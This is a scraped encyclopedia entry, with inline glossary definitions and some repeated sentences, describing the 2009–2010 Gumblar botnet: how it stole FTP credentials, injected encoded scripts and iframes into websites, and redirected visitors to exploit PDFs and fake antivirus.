Gumblar
Encyclopedia
Known as Gumblar by ScanSafe
and Troj/JSRedir-R by Sophos
, this botnet
first appeared in 2009. It is characterized by re-directing user's Google search
es and installing rogue security software.
The virus will find FTP clients such as FileZilla
and Dreamweaver and download the clients' stored passwords. It also enabled promiscuous mode on the network card, allowing it to sniff local network traffic for FTP details. It is one of the first viruses to incorporate an automated network sniffer.
that will infect computers that execute the code. In addition, some pages may have inline frames
inserted into them. Typically, iframe code contains hidden links to certain malicious websites.
The virus will also modify .htaccess
and HOSTS files, and create images.php files in directories named 'images'.
The infection is not a server-wide exploit. It will only infect sites on the server that it has passwords to.
Gumblar resurfaced in January 2010, stealing FTP usernames and passwords and infecting HTML
, PHP
and Javascript
files on webservers to help spread itself. This time using multiple domains to make it harder to detect/stop.
ScanSafe
ScanSafe was a privately held company backed by investors Benchmark Capital and Scale Venture Partners, it was a provider of Web security-as-a-service for organizations. Co-founded in 1999 by brothers Eldar and Roy Tuvey, its services block malware and secure the use of the Web and messaging...
and Troj/JSRedir-R by Sophos
Sophos
Sophos is a developer and vendor of security software and hardware, including anti-virus, anti-spyware, anti-spam, network access control, encryption software and data loss prevention for desktops, servers, email systems and other network gateways....
, this botnet
Botnet
A botnet is a collection of compromised computers connected to the Internet. Termed "bots," they are generally used for malicious purposes. When a computer becomes compromised, it becomes a part of a botnet...
first appeared in 2009. It is characterized by re-directing user's Google search
Google search
Google or Google Web Search is a web search engine owned by Google Inc. Google Search is the most-used search engine on the World Wide Web, receiving several hundred million queries each day through its various services....
es and installing rogue security software.
Windows Personal Computers
Visitors to an infected site will be redirected to an alternative site containing further Malware, which was once gumblar.cn, but has now switched to a variety of domains. The site sends the visitor an infected PDF that is opened by the visitor's browser or Acrobat Reader. The PDF will then exploit a known vulnerability in Acrobat to gain access to the user's computer. On the new variations of Gumblar, it is redirecting users to sites running the fake anti virus.The virus will find FTP clients such as FileZilla
FileZilla
FileZilla is free, open source, cross-platform FTP software, consisting of FileZilla Client and FileZilla Server. Binaries are available for Windows, Linux, and Mac OS X. It supports FTP, SFTP, and FTPS . As of 18 April 2011, FileZilla Client was the 7th most popular download of all time from...
and Dreamweaver and download the clients' stored passwords. It also enabled promiscuous mode on the network card, allowing it to sniff local network traffic for FTP details. It is one of the first viruses to incorporate an automated network sniffer.
Servers
Using passwords obtained from site admins, the host site will access a website via FTP and infect the website. It will download large portions of the website and inject malicious code into the website's files before uploading the files back onto the server. The code is inserted into any file that contains a tag, such as HTML, PHP, JavaScript, ASP and ASPx files. The inserted PHP code contains base64-encoded JavaScriptJavaScript
JavaScript is a prototype-based scripting language that is dynamic, weakly typed and has first-class functions. It is a multi-paradigm language, supporting object-oriented, imperative, and functional programming styles....
that will infect computers that execute the code. In addition, some pages may have inline frames
IFrame
iFrame can be:* I-frames, in video compression; see video compression picture types* iFrame * The HTML iframe element....
inserted into them. Typically, iframe code contains hidden links to certain malicious websites.
The virus will also modify .htaccess
.htaccess
A .htaccess file is a directory-level configuration file supported by several web servers, that allows for decentralized management of web server configuration....
and HOSTS files, and create images.php files in directories named 'images'.
The infection is not a server-wide exploit. It will only infect sites on the server that it has passwords to.
Gumblar variants
Different companies use different names for gumblar and variants. Initially, the malware was connecting to gumblar.cn domain but this server was shutdown later. However, many badware variants have emerged after that and they connect to various malicious servers via iframe code.Gumblar resurfaced in January 2010, stealing FTP usernames and passwords and infecting HTML
HTML
HyperText Markup Language is the predominant markup language for web pages. HTML elements are the basic building-blocks of webpages....
, PHP
PHP
PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document...
and Javascript
JavaScript
JavaScript is a prototype-based scripting language that is dynamic, weakly typed and has first-class functions. It is a multi-paradigm language, supporting object-oriented, imperative, and functional programming styles....
files on webservers to help spread itself. This time using multiple domains to make it harder to detect/stop.